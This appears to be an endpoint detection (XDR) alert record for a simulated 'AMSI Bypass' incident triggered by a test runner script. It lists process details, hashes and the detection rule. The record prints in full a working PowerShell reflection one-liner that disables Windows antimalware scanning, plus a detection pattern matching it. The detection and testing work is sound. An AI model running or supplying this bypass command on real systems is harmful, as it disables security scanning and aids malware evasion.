MEDIUM AMSI Bypass
Detected
ID: #332
|
Detected: 2026-01-01 06:22:06
|
Lateral Movement
Alert Overview
Process action type = execution AND target process cmd = *system.management.automation.amsiutils*amsiinitfailed*
Unclassified
XDR BIOC
New
DS:PANW/XDR Agent
DOM:Security
Host Information
Process Information
Process Execution
Actor Process (Executor)
| Process Name | cmd.exe |
|---|---|
| Path | C:\Windows\System32\cmd.exe |
| PID | 16220 |
| SHA256 |
64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4
VT
|
| MD5 | 6d109a3a00f210c1ab89c3b08399ed48 |
| Signature | Microsoft Corporation Signed |
C:\windows\system32\cmd.exe /c "powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)""Action Process (Target)
| Process Name | powershell.exe |
|---|---|
| SHA256 |
0ff6f2c94bc7e2833a5f7e16de1622e5dba70396f31c7d5f56381870317e8c46
VT
|
| Signature | Microsoft Corporation Signed |
powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"Parent Process (Causality)
| Process Name | cmd.exe |
|---|---|
| Path | C:\Windows\System32\cmd.exe |
| SHA256 |
64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4
VT
|
| MD5 | 6d109a3a00f210c1ab89c3b08399ed48 |
C:\windows\SYSTEM32\cmd.exe /c ""C:\app\cortex-xdr-siem-test\xdr_incident_runner.bat""MITRE ATT&CK Mapping
Severity Analysis
MEDIUM
Review and assess impact
Summary
Events
1
IP Addresses
1
Tags
2
File Artifacts
Yes
Network Artifacts
No
Registry Artifacts
No
Analyst Verdict